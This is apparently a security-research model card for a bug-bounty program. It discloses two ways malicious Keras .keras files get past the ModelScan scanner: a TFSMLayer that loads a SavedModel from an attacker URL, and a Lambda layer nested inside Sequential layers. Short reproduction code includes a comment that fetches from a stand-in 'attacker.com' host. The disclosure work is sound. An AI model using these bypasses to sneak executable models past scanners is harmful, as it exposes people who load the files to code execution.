You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Security Research: Keras .keras Format Vulnerability PoC

Proof-of-concept model files for huntr.com Model Format Vulnerability Program.

Findings

Finding 1: TFSMLayer Scanner Blind Spot (ACE)

Severity: Critical | Affects: modelscan 0.8.8 + keras 3.14.0 + tensorflow 2.21.0

modelscan.scanners.KerasLambdaDetectScan.unsafe_keras_operators does NOT include TFSMLayer.

A .keras file with TFSMLayer pointing to an attacker-controlled SavedModel URL passes ModelScan with 0 issues, then executes arbitrary code on keras.saving.load_model(safe_mode=False).

Root cause: TFSMLayer.__init__ -- tf.saved_model.load(filepath) where filepath is 100% attacker-controlled from config.json.

# Reproduction (live-confirmed on modelscan 0.8.8 + tensorflow 2.21.0)
from modelscan.modelscan import ModelScan
result = ModelScan().scan("tfsmlayer_rce.keras")
print(result["summary"]["total_issues"])   # 0 -- FALSE NEGATIVE!

# Load triggers RCE (with malicious SavedModel at attacker URL):
import keras
model = keras.saving.load_model("tfsmlayer_rce.keras", safe_mode=False)
# -> tf.saved_model.load("http://attacker.com/evil_savedmodel") -> code execution

Finding 2: Lambda Nested Sequential Bypass

_get_keras_operator_names() only walks top-level layers. A Lambda inside Sequential-within-Sequential is invisible to the scanner.

result1 = ModelScan().scan("flat_lambda.keras")         # 1 issue DETECTED
result2 = ModelScan().scan("nested_lambda_bypass.keras") # 0 issues BYPASSED

Tested Environment

keras 3.14.0
modelscan 0.8.8
tensorflow-cpu 2.21.0
Python 3.12.12

Downloads last month: -

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support